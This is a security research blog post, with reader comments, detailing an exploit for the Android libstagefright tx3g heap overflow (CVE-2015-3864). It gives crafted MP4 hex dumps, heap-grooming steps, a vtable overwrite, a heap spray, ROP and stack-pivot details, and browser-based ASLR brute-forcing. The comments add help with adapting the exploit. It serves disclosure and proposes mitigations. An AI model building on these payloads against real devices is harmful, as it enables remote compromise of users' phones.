Wednesday, September 16, 2015

Stagefrightened?

Posted by Mark Brand, Bypasser of Mitigations

There’s been a lot of attention recently around a number of vulnerabilities in Android’s libstagefright. There’s been a lot of confusion about the remote exploitability of the issues, especially on modern devices. In this blog post we will demonstrate an exploit for one of the libstagefright vulnerabilities that works on recent Android versions (Android 5.0+ on Nexus 5).

The vulnerability (CVE-2015-3864) that we’ve chosen to exploit is an imperfect patch for one of the issues reported by Joshua Drake, which has been fixed for Nexus devices in the September bulletin. Several parties noticed the problem, including at least Exodus Intel and Natalie Silvanovich of Project Zero. It’s a promising looking bug from an exploitation perspective: a linear heap-overflow giving the attacker control over the size of the allocation; the amount of overflow, and the contents of the overflowed memory region.

The vulnerable code is in handling the ‘tx3g’ chunk type when parsing MPEG4 video files. Here’s the original vulnerable code:

Note when reading that chunk_size is a uint64_t that is parsed from the file; it’s completely controlled by the attacker and is not validated with regards to the remaining data available in the file.

The issue with this patch is that chunk_size actually doesn’t have type size_t; it is a uint64_t even on 32-bit platforms (most Android devices are currently 32-bit, and currently the mediaserver is a 32-bit process even on 64-bit Android devices). While the check appears to a casual glance to be sufficient; it is not; chunk_size can be larger than SIZE_MAX, causing the check to pass.

My first step towards exploiting a bug is usually to establish proof-of-vulnerability; in this case we should definitely be able to crash the mediaserver by triggering this issue, so let’s do just that and put together a simple crash case.

We first need a file that will be detected by libstagefright as an MPEG4 and parsed accordingly; looking at the file sniffing code, we need to start with an ‘ftyp’ chunk near the start of the file.

0000000: 0000 00146674 79706973 6f6d 0000 0001....ftypisom....

0000010: 6973 6f6disom

Note the structure of the chunk; we have a 4-byte big-endian chunk size, and 4-byte tag followed by the chunk data.

So we need to have at least one track before we can actually reach the vulnerable code. The ‘trak’ chunk will initialise mLastTrack, and acts as a container for additional chunks.

New ‘trak’ chunk

0000000: 0000 00146674 79706973 6f6d 0000 0001 ....ftypisom....

0000010: 6973 6f6d0000 00207472 616b0000 0018 isom... trak....

0000020: 7478 3367 4141 4141 4141 4141 4141 4141tx3gAAAAAAAAAAAA

0000030: 4141 4141AAAA

And highlighting the ‘tx3g’ chunk contained in the ‘trak’ chunk.

0000000: 0000 00146674 79706973 6f6d 0000 0001 ....ftypisom....

0000010: 6973 6f6d0000 00207472 616b0000 0018 isom... trak....

0000020: 7478 33674141 4141 4141 4141 4141 4141tx3gAAAAAAAAAAAA

0000030: 4141 4141AAAA

So, this file will get us into the ‘tx3g’ case once; but it won’t trigger the vulnerability. In order to do that, we need to visit the case again with another chunk, this time with a chunk_size large enough to trigger an overflow. Keeping things simple, we’ll supply a chunk_size of -1 = 0xffffffffffffffff.

0000000: 0000 00146674 79706973 6f6d 0000 0001 ....ftypisom....

0000010: 6973 6f6d0000 00207472 616b0000 0018 isom... trak....

0000020: 7478 33674141 4141 4141 4141 4141 4141 tx3gAAAAAAAAAAAA

0000030: 4141 41410000 00017478 3367ffff ffff AAAA....tx3g....

0000040: ffff ffff4242 4242 4242 4242 4242 4242....BBBBBBBBBBBB

0000050: 4242 4242 4242 4242 4242 4242 4242 4242BBBBBBBBBBBBBBBB

0000060: 4242 4242BBBB

Notice that the structure of this second chunk is a little different; we have to use the extended chunk_size code path triggered by a chunk_size of 1 in order to set the full 64-bit chunk_size.

We now have a simple file to trigger the issue; when I open this file in Chrome on my Nexus 5 with some extra debugging code, printing some useful information to the Android system logs:

We can clearly see here that the input file triggered two allocations by the parser on handling the two ‘tx3g’ chunks, and that we’re definitely writing data out-of-bounds of our allocated memory in the last two lines.

Since we’re only overflowing a handful of bytes, and the heap allocator in use on this Android version is based on jemalloc, it’s relatively unlikely that we’ll overwrite anything important and see a crash with such a small overwrite. Modifying the PoC file so that the parser will write a big old chunk of bytes instead should get us a demonstrable crash; that’s as simple as adding more ‘B’s to the end of the file and fixing up the chunk lengths; this is left as an exercise for the interested reader.

We need a few heap-manipulation primitives to get things set up in a dependable fashion. The first thing that I looked for was a primitive to allocate blocks of memory - this will be used for a number of different things in the exploit. Fortunately, there’s a good primitive available in the handling for ‘pssh’ chunks:

// and store it, so the allocation lives for the lifetime of our MPEG4Extractor

// (these pssh blocks are in fact released in the destructor for the MPEG4Extractor)

mPssh.push_back(pssh);

break;

}

This is the first component of our heap-groom; we can use up any fragmented allocations in the size class that we want, ensuring that further allocations are likely to be contiguous.

Now we want a second primitive; allocations that we can control both the allocation and release of. There are a lot of places where allocations occur during parsing of the mp4, but the most useful for this purpose that I found were the handlers for two chunk types, ‘avcC’ and ‘hvcC’. When handling these chunk types, the parser will allocate a block of memory and store it; and replace that allocation with a new one when the parser encounters a second chunk of the same type.

case FOURCC('a', 'v', 'c', 'C'):

{

*offset += chunk_size;

sp<ABuffer> buffer = new ABuffer(chunk_data_size);

if (mDataSource->readAt(

data_offset, buffer->data(), chunk_data_size) < chunk_data_size) {

return ERROR_IO;

}

// this internally copies buffer->data() into a buffer of size chunk_data_size, and

// releases the previously stored data.

mLastTrack->meta->setData(

kKeyAVCC, kTypeAVCC, buffer->data(), chunk_data_size);

break;

}

The plan to gain control of execution is to arrange for the overflow to overwrite an object of type MPEG4DataSource. This is an object of size 32 bytes (on my phone), which the parser allocates when it encounters an ‘stbl’ chunk. The new data source is then used for parsing all sub-chunks contained within the ‘stbl’ chunk. So our aim is to create the following situation:

So, we need to arrange our heap carefully so that we can ensure a free space directly before the allocated MPEG4DataSource.

First we need to make a couple of small sized allocation chunks; a small ‘avcC’ chunk and ‘hvcC’ chunk. These trigger additional temporary allocations in sizes that will interfere with our groom allocations, so we get them out of the way before we start laying out memory.

0000000: 0000 00146674 79706973 6f6d 0000 0001 ....ftypisom....

0000010: 6973 6f6d0000 00287472 616b0000 0010 isom... trak....

0000020: 6176 63434141 4141 4141 41410000 0010avcCAAAAAAAA....

0000030: 6876 63434848 4848 4848 4848hvcCHHHHHHHH

Then we will create our initial ‘tx3g’ allocation. This needs to be the size we’re going to write during the memcpy; we’ll make it 64 bytes for now, so that it completely overwrites the MPEG4DataSource object. The ‘2’s are the bytes that will be written outside the final 32 byte allocation as the result of the overflow.

0000000: 0000 00146674 79706973 6f6d 0000 0001 ....ftypisom....

0000010: 6973 6f6d0000 00687472 616b0000 0010 isom...gtrak....

0000020: 6176 63434141 4141 4141 41410000 0010 avcCAAAAAAAA....

0000030: 6876 63434848 4848 4848 48480000 0040 hvcCHHHHHHHH...@

0000040: 7478 33673131 3131 3131 3131 3131 3131tx3g111111111111

0000050: 3131 3131 3131 3131 3131 31313232 32321111111111112222

0000060: 3232 3232 3232 3232 3232 3232 3232 32322222222222222222

0000070: 3232 3232 3232 3232 3232 3232222222222222

Now we’re ready to start preparing the heap. First we defragment for the targeted allocation size by allocating some ‘pssh’ blocks of the target size:

_________________

| pssh | - | pssh |

```````````````````

0000000: 0000 00146674 79706973 6f6d 0000 0001 ....ftypisom....

...

0000070: 3232 3232 3232 3232 3232 32320000 0040 222222222222...@

0000080: 7073 73686c65 616b 3030 3030 3030 3030 psshleak00000000

0000090: 3030 3030 3030 30300000 00204c4c 4c4c 00000000... LLLL

00000a0: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c LLLLLLLLLLLLLLLL

00000b0: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c

...

These blocks have some internal structure; the only part that we are really concerned with is the size of the allocation and the data.

Then we allocate an avcC and hvcC block of the target size, which should hopefully be contiguous.

________________________

| pssh | - | pssh | avcC |

``````````````````````````

_______________________________

| pssh | - | pssh | avcC | hvcC |

`````````````````````````````````

0000000: 0000 00146674 79706973 6f6d 0000 0001 ....ftypisom....

...

0000170: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c0000 0028 LLLLLLLLLLLL...(

0000180: 6176 63434141 4141 4141 4141 4141 4141avcCAAAAAAAAAAAA

0000190: 4141 4141 4141 4141 4141 4141 4141 4141AAAAAAAAAAAAAAAA

00001a0: 4141 41410000 00286876 63434848 4848AAAA...(hvcCHHHH

00001b0: 4848 4848 4848 4848 4848 4848 4848 4848HHHHHHHHHHHHHHHH

00001c0: 4848 4848 4848 4848 4848 4848HHHHHHHHHHHH

In actual fact, we have a temporary allocation occurring during parsing of the avcC and hvcC blocks, so the heap will actually look like this:

______________________________________

| pssh | - | pssh | .... | avcC | hvcC |

```````````````````````````````````````

So we need to allocate another pssh block to fill the space

______________________________________

| pssh | - | pssh | pssh | avcC | hvcC |

```````````````````````````````````````

We can then free the hvcC block and trigger the allocation of our target MPEG4DataSource

______________________________________

| pssh | - | pssh | pssh | avcC | .... |

```````````````````````````````````````

_________________________________________________

| pssh | - | pssh | pssh | avcC | MPEG4DataSource |

```````````````````````````````````````````````````

0000000: 0000 00146674 79706973 6f6d 0000 0001 ....ftypisom....

...

00001c0: 4848 4848 4848 4848 4848 48480000 0040 HHHHHHHHHHHH...@

00001d0: 7073 73686c65 616b 3030 3030 3030 3030 psshleak00000000

00001e0: 3030 3030 3030 30300000 00204c4c 4c4c 00000000... LLLL

00001f0: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c LLLLLLLLLLLLLLLL

0000200: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c0000 0048 LLLLLLLLLLLL...H

0000210: 6876 63434848 4848 4848 4848 4848 4848hvcCHHHHHHHHHHHH

0000220: 4848 4848 4848 4848 4848 4848 4848 4848HHHHHHHHHHHHHHHH

0000230: 4848 4848 4848 4848 4848 4848 4848 4848HHHHHHHHHHHHHHHH

0000240: 4848 4848 4848 4848 4848 4848 4848 4848HHHHHHHHHHHHHHHH

0000250: 4848 48480000 00087374 626cHHHH....stbl

Then inside our ‘stbl’ chunk we just need to release the ‘avcC’ chunk and trigger the ‘tx3g’ overflow.

_________________________________________________

| pssh | - | pssh | pssh | tx3g | MPEG4DataSource |

```````````````````````````````````````````````````

_________________________________________________

| pssh | - | pssh | pssh | tx3g ---------------------->

```````````````````````````````````````````````````

0000000: 0000 00146674 79706973 6f6d 0000 0001 ....ftypisom....

...

0000250: 4848 48480000 00607374 626c0000 0048 HHHH...`stbl...H

0000260: 6176 63434141 4141 4141 4141 4141 4141avcCAAAAAAAAAAAA

0000270: 4141 4141 4141 4141 4141 4141 4141 4141AAAAAAAAAAAAAAAA

0000280: 4141 4141 4141 4141 4141 4141 4141 4141AAAAAAAAAAAAAAAA

0000290: 4141 4141 4141 4141 4141 4141 4141 4141AAAAAAAAAAAAAAAA

00002a0: 4141 41410000 00017478 3367ffff ffffAAAA....tx3g....

00002b0: ffff ffe0....

Viewing the resulting file in a webpage in Chrome results in the following stack trace:

Which is exactly what we were aiming for; we crashed trying to load a function address through the vtable pointer for our corrupted data source object.

Now we face what should be a serious challenge at this point; due to ASLR we have no idea where anything is in memory; we need somehow to get some data that we control somewhere that we can do something useful with. Due to the way that Linux/Android implements ASLR for mmap mappings, it is quite easy for us to get an allocation mapped at a predictable address; Jemalloc as configured on my Nexus 5 falls back to directly mmap’ing huge chunks for allocations above 0x40000 bytes.

The behaviour of mmap means that these allocations will simply occur down the address space linearly from a randomised start address. Since we have a very good idea how much space is going to be used already (loaded libraries and initial arena allocation), the randomisation just results in a relatively small window that we need to exhaust in order to get a predictable address. The code that implements the randomness (in arch/arm/mm/mmap.c) is as follows:

/* 8 bits of randomness in 20 address space bits */

if ((current->flags & PF_RANDOMIZE) &&

!(current->personality & ADDR_NO_RANDOMIZE))

random_factor = (get_random_int() % (1 << 8)) << PAGE_SHIFT;

So our mmap mappings can be anywhere (page aligned, of course) in an 0-0xff000 range from the maximum position that they can be placed; and we do not need to allocate much memory to exhaust this.

I was initially convinced that I must have misread something, so I coded up a quick test program to validate this:

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include <sys/mman.h>

#define ALLOC_SIZE 0xff000

#define ALLOC_COUNT 0x1

int main(int argc, char** argv) {

int i = 0;

char* min_ptr = (char*)0xffffffff;

char* max_ptr = (char*)0;

for (i = 0; i < ALLOC_COUNT; ++i) {

char* ptr = mmap(NULL, ALLOC_SIZE,

PROT_READ | PROT_WRITE | PROT_EXEC,

MAP_PRIVATE | MAP_ANONYMOUS,

-1, 0);

if (ptr < min_ptr) {

fprintf(stderr, "new min: %p\n", ptr);

min_ptr = ptr;

}

if (ptr + ALLOC_SIZE > max_ptr) {

fprintf(stderr, "new max: %p\n", ptr + ALLOC_SIZE);

max_ptr = ptr + ALLOC_SIZE;

}

memset(ptr, '\xcc', ALLOC_SIZE);

}

fprintf(stderr, "finished min: %p max %p\n", min_ptr, max_ptr);

((void(*)())0xf7500000)();

}

On my Ubuntu x86_64 desktop with /proc/sys/randomize_va_space == 2, compiling and running this as a 32-bit executable reliably results in the address 0xf7500000 being mapped and resulting in a SIGTRAP. Your mileage may vary... Similar tests on my Nexus 5 gave the same result. I knew that ASLR on 32-bit was always a bit shaky; but I didn’t think it was this broken.

It’s slightly less predictable in the mediaserver process, since large amounts of memory may have been used already in previous parsing; but we can reliably get data we control at a predictable address with a relatively small number of allocations.

After a bit of experimentation, it seemed that the best way to achieve this in practice is by wrapping a number of our ‘pssh’ chunks inside a valid sample table (‘stbl’). This triggers the creation of a caching MPEG4DataSource, which will then allocate and save all the data for the contained chunks; and will then be used to parse out the chunks. This essentially doubles the size of our spray, reducing the size of file needed.

Updating our mp4 to incorporate this page-spray and point the overwritten vtable pointer to our predictable address gets us one step further; control over the address called as the vtable function.

So now we have a controlled function call; without ASLR at this point it would be trivially game-over. All that would be needed for a reliable exploit is simply to redirect execution to a convenient gadget to stack pivot, and then build a ROP stack.

Disabling ASLR in the system config I fairly quickly found a useful trick to pivot the stack (our function call is a vtable call, so we will always have r0 set as the this object, pointing to our corrupted MPEG4DataSource).

.text:00013354 BEQ botch_0 ; we won’t take this branch, as we control lr

.text:00013358 MOV R0, R1

.text:0001335C TEQ R0, #0

.text:00013360 MOVEQ R0, #1

.text:00013364 BX LR

This will load most of the registers, including the stack pointer, from an offset on r0, which points to data we control. At this point it’s then trivial to complete the exploit with a ROP chain to allocate some RWX memory, copy in shellcode and jump to it using only functions and gadgets from within libc.so.

Having completed an exploit that works with ASLR disabled, I was planning/expecting to spend a while longer looking for a cunning technique to reliably leverage the issue for a practical exploit without tampering with system settings. I started to investigate a number of different avenues, some of which were more promising than others. My usual preferred next step would be to try and leverage this overflow to construct an infoleak to get the information we need about the process. Since the mediaserver is a background process that we’re interacting with in a fairly detached way, this would likely pose a significant effort. One idea considered was the use of an m3u playlist file, which should be able to request remote files; if we could then corrupt some of the data responsible for handling that playlist, we might be able to leverage that to leak data. Another thought was that the metadata extracted from parsing the file is likely used by the html5 <video> elements; if we could, for example, store a pointer value in place of the length of the video, we could leak this from javascript in a browser context, and serve up a second video customised based on this leak.

Since we do not know the randomised values for the most-significant bytes of an address, we would instead perform a partial overwrite; corrupting only the least-significant byte or bytes of a pointer. I looked at partially overwriting a function pointer on the heap - there were some function pointers that could be overwritten, but they were all allocated early in the process startup, rather than during parsing of the mp4 file, and grooming was going to be problematic. I then looked at partially overwriting a vtable pointer instead. As our exploit so far is reliably corrupting a vtable pointer, it’s not a problem to adjust this to simply overwrite the least-significant byte of that vtable pointer instead. The vtables in the libstagefright library are positioned close to the GOT (Global Offset Table) which is used heavily in position-independent executables, and this means that we have a choice of a very wide range of functions that we could call instead of the intended function; this could be as subtle as creating a type-confusion with our MPEG4DataSource and another DataSource type. Continuing with the exploit at this point is looking like an extensive assessment of available functions in (and imported by) the compiled stagefright code to find one which will be useful to us...

We do have an alternative; albeit an inelegant one. The mediaserver process will respawn after a crash, and there is 8 bits of entropy in the libc.so base address. This means that we can take a very straightforward approach to bypassing ASLR. We simply choose one of the 256 possible base addresses for libc.so, and write our exploit and ROP stack assuming that layout. Launching the exploit from the browser, we use javascript to keep refreshing the page, and wait for a callback. Eventually memory will be laid out as we expect, bypassing ASLR with brute force in a practical enough way for real-world exploitation.

This is only possible because we can achieve a highly reliable heap-spray to get data we control at a known address, independent of the process randomisation. If we had to brute-force two addresses here, the address of our known data and the libc base, this would be less practical.

It’s also interesting to note that the mediaserver is a special case, at least on my test phone; it isn’t cloned from a zygote process, but is instead directly execve’ed - this means that the address space is re-randomised on every exploit attempt. As a result our brute force is not deterministic, and we can’t put a guaranteed upper-bound on time to exploit.

I did some extended testing on my Nexus 5; and results were pretty much as expected. In 4096 exploit attempts I got 15 successful callbacks; the shortest time-to-successful-exploit was lucky, at around 30 seconds, and the longest was over an hour. Given that the mediaserver process is throttled to launching once every 5 seconds, and the chance of success is 1/256 per attempt, this gives us a ~4% chance of a successful exploit each minute.

So, while it could be more elegant, reliable and effective to use a more sophisticated technique to exploit this bug without requiring a brute-force; it turns out that it’s not really necessary. It’s not unreasonable for a real-world watering hole attack to get a user to browse a page long enough for the exploit to succeed, especially through in-app adverts using WebView.

During the last few weeks spent developing this exploit, there were a couple of additional hardening measures that we discussed internally to Project Zero, and have shared as suggestions to the Android security team.

Hardened mmap implementation. Chrome’s PartitionAlloc augments the weak randomisation provided by mmap(NULL, …) calls; Android could do a similar thing. This would dramatically reduce the effectiveness of the heap-spray, making it harder for an attacker to gain that crucial ‘controlled data at a known address’ leveraged in this exploit.

Further hardening libc implementation. Existing libc implementations have implemented pointer mangling for their setjmp/longjmp and similar functions; this has two security benefits. Firstly it protects against corruption of jmp_buf structures, and secondly it prevents an attacker from using these functions as one-stop ROP gadget/stack pivot.

Neither of these are ‘hard’ mitigations; their implementation won’t prove non-exploitability of future memory corruption vulnerabilities on Android devices, but their adoption should increase the cost for attackers in developing reliable exploits for future Android vulnerabilities; and that will be a welcome success.

No; no user interaction is required; and no modification of chrome://flags. It's exploiting during the initial parse of the media file, not the playback; so it's triggered when the page containing the media file loads. Parsing has to happen at that point in order to display the duration of the video; it's not necessary to click play first.

I will be allocating 0 bytes memory for the buffer and lib will be writing out of bounds (24 bytes). I am using Android 5.0.2 (cyanogenmod) and it behaves very weird after I open such a file.

How can I debug it or view logs on my android device? It is rooted.

2) in regards to your exploit, which libc.so should I use, one from Android device?

To run the exploit I copied the libc.so from Android to the working directory. However pop_r0_r1_r2_r3_pc and pop_r4_r5_r6_r7_pc cannot be found. I hardcoded them to 0xffffffff just to see if it runs further. How to properly get those values?

You can view the crash logs as they occur by using logcat (http://developer.android.com/tools/help/logcat.html). Most builds of cyanogenmod are userdebug builds, so you should also have gdbserver on the device. You can then setup port-forwarding and debug using a gdb build that has arm support from your host.

You should indeed just copy libc.so from your device to the local folder. pop_r0_r1_r2_r3_pc and pop_r4_r5_r6_r7_pc are instruction sequences that are needed for the rop chain used in the exploit; to fix the exploit for your device you'd need to rewrite the rop chain using different instructions instead.

Great explanation.From the source code in MPEG4Extractor.cpp, I can see that for the 'stbl' chunk to trigger the MPEG4DataSource allocation the flags for the current mDataSource must contain kWantsPrefetching or kIsCachingDataSource. Is this always the case?Also, as I unserstood it, the fake vtable should contain a pointer to the stack pivot in order to build the ROP stack. But, how can we gurantee that the vtable pointer which we overwrite will always point to the right place in memory? Why is the heap spray full of 0xCCs?

Hi, very good article! But when I debug it, the mediaserver will crash at mLastTrack->meta->findData(kKeyTextFormatData, &type, &data, &size)) of function parseChunk because of segmentation violation. Does anyone has come across this situation？ Could we discuss about it?